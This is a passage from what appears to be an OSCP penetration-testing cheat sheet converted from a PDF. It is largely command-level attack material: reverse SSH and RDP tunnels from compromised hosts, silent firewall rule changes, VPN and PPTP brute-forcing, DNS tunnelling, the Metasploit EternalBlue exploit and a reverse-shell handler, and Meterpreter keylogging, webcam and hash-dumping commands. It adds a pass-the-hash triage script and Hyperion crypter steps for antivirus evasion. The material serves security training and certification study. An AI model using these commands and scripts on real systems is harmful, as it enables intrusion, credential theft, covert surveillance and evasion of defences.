    - `ssh <gateway> -R <remote port to bind>:<local host>:<local port>`

- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY port

    - `ssh -D <local proxy port> -p <remote port> <target>`

- Proxychains - perform an nmap scan within a DMZ from an external computer

    - Create a reverse SSH tunnel from the popped machine on :2222

        `ssh -f -N -T -R2222:localhost:22 yourpublichost.example.com`

        `ssh -f -N -R 2222:<local host>:22 root@<remote host>`

    - Create a dynamic application-level port forward on 8080 through 2222

        `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`

    - Leverage the SSH SOCKS server to perform an Nmap scan on the network using proxychains

        `proxychains nmap --top-ports=20 -sT -Pn $ip/24`

- HTTP Tunneling

    `nc -vvn $ip 8888`

- Traffic Encapsulation - Bypassing deep packet inspection

    - http tunnel

        On server side:

        `sudo hts -F <server ip addr>:<port of your app> 80`

        On client side:

        `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel`

- Tunnel Remote Desktop (RDP) from a popped Windows machine to your network

    - Tunnel on port 22

        `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`

    - Port 22 blocked? Try port 80 or 443

        `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 80`

- Tunnel Remote Desktop (RDP) from a popped Windows machine using HTTP Tunnel (bypass deep packet inspection)

    - Windows machine: add the required firewall rules without prompting the user

        - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`

        - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`

        - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`

        - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`

    - Start the http tunnel client

        `httptunnel_client.exe`

    - Create an HTTP reverse shell by connecting to localhost port 3000

        `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`

- VLAN Hopping

    ```
    git clone https://github.com/nccgroup/vlan-hopping.git
    cd vlan-hopping/
    chmod 700 frogger.sh
    ./frogger.sh
    ```

- VPN Hacking

    - Identify VPN servers:

        `./udp-protocol-scanner.pl -p ike $ip`

    - Scan a range for VPN servers:

        `./udp-protocol-scanner.pl -p ike -f ip.txt`

    - Use IKEForce to enumerate or dictionary attack VPN servers:

        `pip install pyip`

        `git clone https://github.com/SpiderLabs/ikeforce.git`

        Perform IKE VPN enumeration with IKEForce:

        `./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic`

        Bruteforce IKE VPN using IKEForce:

        `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1`

        Use ike-scan to capture the PSK hash:

        ```
        ike-scan
        ike-scan TARGET-IP
        ike-scan -A TARGET-IP
        ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
        ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
        ```

        Use psk-crack to crack the PSK hash:

        ```
        psk-crack hash-file.txt
        psk-crack -b 5 TARGET-IPkey
        psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
        psk-crack -d /path/to/dictionary-file TARGET-IP-key
        ```

- PPTP Hacking

    - Identifying PPTP: it listens on TCP 1723

        NMAP PPTP fingerprint:

        `nmap -Pn -sV -p 1723 TARGET(S)`

        PPTP dictionary attack:

        `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`

- Port Forwarding/Redirection

    - PuTTY Link tunnel - SSH Tunneling

        - Forward remote port to local address:

            `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`

- SSH Pivoting

    - SSH pivoting from one network to another:

        `ssh -D <local host>:1010 -p 22 user@<remote host>`

- DNS Tunneling

    - dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from the target machine.

    - Attacking machine installation:

        ```
        apt-get update
        apt-get -y install ruby-dev git make g++
        gem install bundler
        git clone https://github.com/iagox86/dnscat2.git
        cd dnscat2/server
        bundle install
        ```

    - Run dnscat2:

        ```
        ruby ./dnscat2.rb
        dnscat2> New session established: 1422
        dnscat2> session -i 1422
        ```

    - Target machine:

        https://downloads.skullsecurity.org/dnscat2/

        https://github.com/lukebaggett/dnscat2-powershell/

        `dnscat --host <dnscat server ip>`
2332. <span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework
2333. ======================================================================================================================

2334.
2335. - See [*Metasploit Unleashed
2336. Course*](https://www.offensive-security.com/metasploit-unleashed/)
2337. in the Essentials

2338.
2339. - Search for exploits using Metasploit GitHub framework source code:
2340. [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)

2341. Translate them for use on OSCP LAB or EXAM.


2342.
2343. - Metasploit

2344.
2345. - MetaSploit requires Postfresql
2346.
2347. `systemctl start postgresql`

2348.
2349. - To enable Postgresql on startup
2350.

2351. `systemctl enable postgresql`


2352.
2353. - MSF Syntax

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2354.
2355. - Start metasploit
2356.
2357. `msfconsole `

2358.
2359. `msfconsole -q`
2360.

2361. - Show help for command


2362.
2363. `show -h`
2364.

2365. - Show Auxiliary modules


2366.
2367. `show auxiliary`

2368.
2369. - Use a module
2370.

2371. `use auxiliary/scanner/snmp/snmp_enum


2372. use auxiliary/scanner/http/webdav_scanner
2373. use auxiliary/scanner/smb/smb_version
2374. use auxiliary/scanner/ftp/ftp_login

2375. use exploit/windows/pop3/seattlelab_pass`


2376.
2377. - Show the basic information for a module

2378.
2379. `info`
2380.
2381. - Show the configuration parameters for a module

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2382.
2383. `show options`
2384.

2385. - Set options for a module


2386.
2387. `set RHOSTS 192.168.1.1-254

2388. set THREADS 10`


2389.
2390. - Run the module
2391.

2392. `run`
2393.
2394. - Execute an Exploit

2395.
2396. `exploit`
2397.
2398. - Search for a module

2399.
2400. `search type:auxiliary login`
2401.

2402. - Metasploit Database Access


2403.
2404. - Show all hosts discovered in the MSF database

2405.
2406. `hosts`
2407.
2408. - Scan for hosts and store them in the MSF database

2409.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2410. `db_nmap`
2411.

2412. - Search machines for specific ports in MSF database


2413.
2414. `services -p 443`

2415.
2416. - Leverage MSF database to scan SMB ports (auto-completed rhosts)
2417.
2418. `services -p 443 --rhosts`

2419.
2420. - Staged and Non-staged
2421.

2422. - Non-staged payload - is a payload that is sent in its entirety in one go


2423.
2424. - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus
2425.

2426. - MS 17-010 - EternalBlue


2427.
2428. - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended

course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in
Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install
it taken from the following YouTube video:

2429. https://www.youtube.com/watch?v=4OHLor9VaRI
2430.
2431.
2432. 1. First step is to configure the Kali to work with wine 32bit

2433.
2434. `dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2435. rm -r ~/.wine

2436. wine cmd.exe


2437. exit`
2438.
2439. 2. Download the exploit repostory

2440. https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2441.
2442. 3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

2443.
2444. 4. Start metasploit console
2445.

2446.
2447. I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
2448.
2449.

2450. `use exploit/windows/smb/eternalblue_doublepulsar


2451. msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
2452. RHOST => 10.11.1.73

2453. msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe


2454. PROCESSINJECT => spoolsv.exe
2455. msf exploit(eternalblue_doublepulsar) > run`
2456.

2457.
2458.
2459. - Experimenting with Meterpreter

2460.
2461. - Get system information from Meterpreter Shell
2462.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2463. `sysinfo`
2464.
2465. - Get user id from Meterpreter Shell
2466.

2467. `getuid`
2468.
2469. - Search for a file

2470.
2471. `search -f *pass*.txt`
2472.

2473. - Upload a file


2474.
2475. `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
2476.

2477. - Download a file


2478.
2479. `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`

2480.
2481. - Invoke a command shell from Meterpreter Shell
2482.
2483. `shell`

2484.
2485. - Exit the meterpreter shell
2486.

2487. `exit`
2488.
2489. - Metasploit Exploit Multi Handler

2490.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2491. - multi/handler to accept an incoming reverse\_https\_meterpreter
2492.
2493. `payload

2494. use exploit/multi/handler


2495. set PAYLOAD windows/meterpreter/reverse_https
2496. set LHOST $ip

2497. set LPORT 443


2498. exploit
2499. [*] Started HTTPS reverse handler on https://$ip:443/`
2500.

2501. - Building Your Own MSF Module


2502.
2503. - `mkdir -p ~/.msf4/modules/exploits/linux/misc

2504. cd ~/.msf4/modules/exploits/linux/misc
2505. cp
2506. /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb

2507. ./crossfire.rb
2508. nano crossfire.rb`
2509.
- Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)

- `download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system. Its techniques need a session that is already privileged (typically local administrator); from a plain user it usually fails and a separate privilege escalation is needed first
`hashdump` Dumps the contents of the SAM database. Needs SYSTEM, so run `getsystem` first; output is one `user:RID:LM:NT:::` line per account

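Turning `hashdump` output into the next step (crack or pass-the-hash), as an added example that is not part of the guide. It assumes the standard `user:RID:LM:NT:::` line format shown above; the sample lines are constructed for illustration, and the function names are mine. The only real constants are the well-known "no LM hash" and "empty password NT hash" values.

```python
"""Parse Meterpreter `hashdump` output and pull out what the next step needs.

Added example, not from the guide: the sample lines below are constructed
(accounts, RIDs and hashes chosen by hand for illustration); the only real
constants are the well-known empty LM and empty NT hash values.
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# hashdump prints one account per line: user:RID:LM:NT:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample output (not captured from a real host).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
offsec:1001:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
svc_backup:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
garbage line that is not a hash
"""


def parse_hashdump(text):
    """Return a list of dicts, one per well-formed hashdump line; skip the rest."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner text, blank lines, anything not in user:rid:lm:nt::: form
        accounts.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return accounts


def triage(accounts):
    """Classify each account by the follow-up action a tester would take."""
    out = {}
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            out[a["user"]] = "empty password"
        elif a["lm"] != EMPTY_LM:
            # LM is case-insensitive and split into two 7-char halves: crack it first
            out[a["user"]] = "LM hash present, crack LM first"
        else:
            out[a["user"]] = "NT only, crack with a wordlist or pass-the-hash"
    return out


def pth_credentials(accounts):
    """Return {user: 'LM:NT'} in the form pass-the-hash tools (e.g. pth-winexe) accept."""
    return {a["user"]: f"{a['lm']}:{a['nt']}" for a in accounts if a["nt"] != EMPTY_NT}


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    for user, verdict in triage(accts).items():
        print(f"{user:15} {verdict}")
    print(pth_credentials(accts))
```

Feed it the text you pasted out of the Meterpreter session; accounts with the empty NT hash are skipped for pass-the-hash because a blank password is simply typed in, and any account with a real LM hash is worth cracking first since LM falls to brute force in minutes.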

- Meterpreter Post Exploitation Features

- Create a Meterpreter background session

`background`

<span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software
===========================================================================================================================

- Crypting Known Malware with Software Protectors

- One such open source crypter, called Hyperion, encrypts a 32-bit PE with AES under a deliberately weak key; the container it produces brute-forces the key at run time, then decrypts and runs the original in memory, so neither the cleartext nor the key is present in the file on disk. Build it with the mingw cross compiler and run it under Wine (adjust the `5.3-win32` directory to whatever version is present under /usr/lib/gcc/i686-w64-mingw32/). Expect the result to still be flagged by many current AV engines, which signature Hyperion's own stub, so test it against the target's product before relying on it.

`cp /usr/share/windows-binaries/Hyperion-1.0.zip .
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe`
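The mechanism behind the Hyperion step above, as an added example that is not Hyperion's code and not from the guide: the payload is encrypted under a key that is mostly zero, only the ciphertext and a checksum are shipped, and the "stub" recovers the few unknown key bytes by brute force before use. Hyperion does this with AES-128 on a PE image; this stand-in uses a SHA-256 counter keystream so it runs with the standard library only, the payload is a constructed byte string rather than an executable, and the function names and `UNKNOWN_BYTES` parameter are my choices. Nothing here loads or executes anything.

```python
"""Crypter concept behind Hyperion: encrypt under a weak key, brute-force it at run time.

Added example, not Hyperion's code. Hyperion uses AES-128 on a PE; this version
derives a keystream from SHA-256 (standard library only) and the payload is a
constructed byte string. The key is discarded after encryption, exactly as the
crypter does not embed it in the output binary.
"""
import hashlib
import itertools
import os

KEY_LEN = 16        # mirrors a 128-bit key
UNKNOWN_BYTES = 2   # key bytes the stub does not know; 2^16 candidates worst case


def keystream(key, length):
    """Counter-mode keystream: SHA-256(key || counter) blocks, truncated to length."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(data, stream):
    """XOR two equal-length byte strings (stream is cut to len(data))."""
    n = len(data)
    return (int.from_bytes(data, "big") ^ int.from_bytes(stream[:n], "big")).to_bytes(n, "big")


def encrypt_with_weak_key(plaintext, unknown_bytes=UNKNOWN_BYTES):
    """Encrypt under a key whose last `unknown_bytes` are random and the rest zero.

    Returns (ciphertext, checksum). The key itself is intentionally thrown away.
    """
    key = bytes(KEY_LEN - unknown_bytes) + os.urandom(unknown_bytes)
    checksum = hashlib.sha256(plaintext).digest()
    return xor(plaintext, keystream(key, len(plaintext))), checksum


def bruteforce_decrypt(ciphertext, checksum, unknown_bytes=UNKNOWN_BYTES):
    """What the stub does at start-up: try every key in the small space until the checksum matches.

    Returns (plaintext, attempts); raises ValueError if no key in the space fits.
    """
    prefix = bytes(KEY_LEN - unknown_bytes)
    for attempt, tail in enumerate(itertools.product(range(256), repeat=unknown_bytes), start=1):
        candidate = xor(ciphertext, keystream(prefix + bytes(tail), len(ciphertext)))
        if hashlib.sha256(candidate).digest() == checksum:
            return candidate, attempt
    raise ValueError("no key in the search space reproduces the checksum")


# Constructed stand-in payload; in Hyperion this would be the whole PE image.
PAYLOAD = b"MZ\x90\x00" + b"constructed fake payload bytes, not a real executable" * 2


def demo():
    """Round trip: encrypt, forget the key, recover it by brute force. Returns (intact, tries)."""
    blob, tag = encrypt_with_weak_key(PAYLOAD)
    recovered, tries = bruteforce_decrypt(blob, tag)
    return recovered == PAYLOAD, tries


if __name__ == "__main__":
    ok, tries = demo()
    print(f"recovered payload intact: {ok}, keys tried: {tries}")
```

The number of unknown bytes is the whole trade-off: two bytes costs the stub a fraction of a second, which is enough to keep the cleartext out of a static scan, while a real cryptographic key would make the binary unrunnable. Because the same brute-force loop is in every output file, it is also exactly what AV vendors signature, which is why crypting alone rarely survives an up-to-date engine.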


OSCP Course Review
================================================================================================================

- Offensive Security's PWB and OSCP - My Experience
[*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)

- OSCP Journey
[*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)

- Down with OSCP
[*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)

- Jolly Frogs - Tech Exams (Very thorough)
[*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)

<span id="_pxmpirqr11x0" class="anchor"><span id="_Toc480741798" class="anchor"></span></span>OSCP Inspired VMs and Walkthroughs
================================================================================================================================

- [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
[*https://www.root-me.org/*](https://www.root-me.org/)

- Walkthrough of Tr0ll-1 - inspired by the trolling found in the OSCP exam
[*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)
Another walkthrough for Tr0ll-1 (Null Byte, framed around Nmap 7 scanning)
[*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)
Taming the troll - walkthrough
[*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
Troll download on VulnHub
[*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)

- SickOs - Walkthrough:
[*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)
SickOs - inspired by the labs in OSCP
[*https://www.vulnhub.com/series/sickos,70/*](https://www.vulnhub.com/series/sickos,70/)

- Lord of the Root Walkthrough
[*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
Lord Of The Root: 1.0.1 - inspired by OSCP
[*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)

- Tr0ll-2 Walkthrough
[*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
Tr0ll-2
[*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)

<span id="_kfwx4om2dsj4" class="anchor"><span id="_Toc480741799" class="anchor"></span></span>Cheat Sheets
==========================================================================================================

- Penetration Tools Cheat Sheet
[*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)

- Pen Testing Bookmarks
[*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)

- OSCP Cheatsheets
[*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)

- CEH Cheatsheet
[*https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)

- NetBIOS Scan Cheat Sheet
[*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)

- Reverse Shell Cheat Sheet
[*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

- Nmap Cheat Sheet
[*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)

- Linux Commands Cheat Sheet
[*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)

- Security Hardening CentOS 7
[*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)

- Metasploit Cheat Sheet (SANS SEC560 misc tools sheet)
[*https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)

- Google Hacking Database:
[*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)

- Windows Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)

- Linux Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)

- A bit dated but most is still relevant
[*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)

- NetCat, Nmap, hping3 and Meterpreter quick references

- [*http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)

- [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)

- [*http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)

- [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)

- [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)

- [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)

Essentials
========================================================================================================

- Exploit-db
[*https://www.exploit-db.com/*](https://www.exploit-db.com/)

- SecurityFocus - Vulnerability database
[*http://www.securityfocus.com/*](http://www.securityfocus.com/)

- Vuln Hub - Vulnerable by design
[*https://www.vulnhub.com/*](https://www.vulnhub.com/)

- Exploit Exercises
[*https://exploit-exercises.com/*](https://exploit-exercises.com/)

- SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads
[*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)

- Security Tube
[*http://www.securitytube.net/*](http://www.securitytube.net/)

- Metasploit Unleashed - free course on how to use Metasploit
[*https://www.offensive-security.com/metasploit-unleashed/*](https://www.offensive-security.com/metasploit-unleashed/)

- 0Day Security Enumeration Guide
[*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)

- Github IO Book - Pen Testing Methodology
[*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)

Windows Privilege Escalation
========================================================================================================

- Fuzzy Security
[*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)

- accesschk.exe
https://technet.microsoft.com/en-us/sysinternals/bb664922

- Windows Priv Escalation For Pen Testers
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

- Elevating Privileges to Admin and Further
https://hackmag.com/security/elevating-privileges-to-administrative-and-further/

- Transfer files to Windows machines
https://blog.netspi.com/15-ways-to-download-a-file/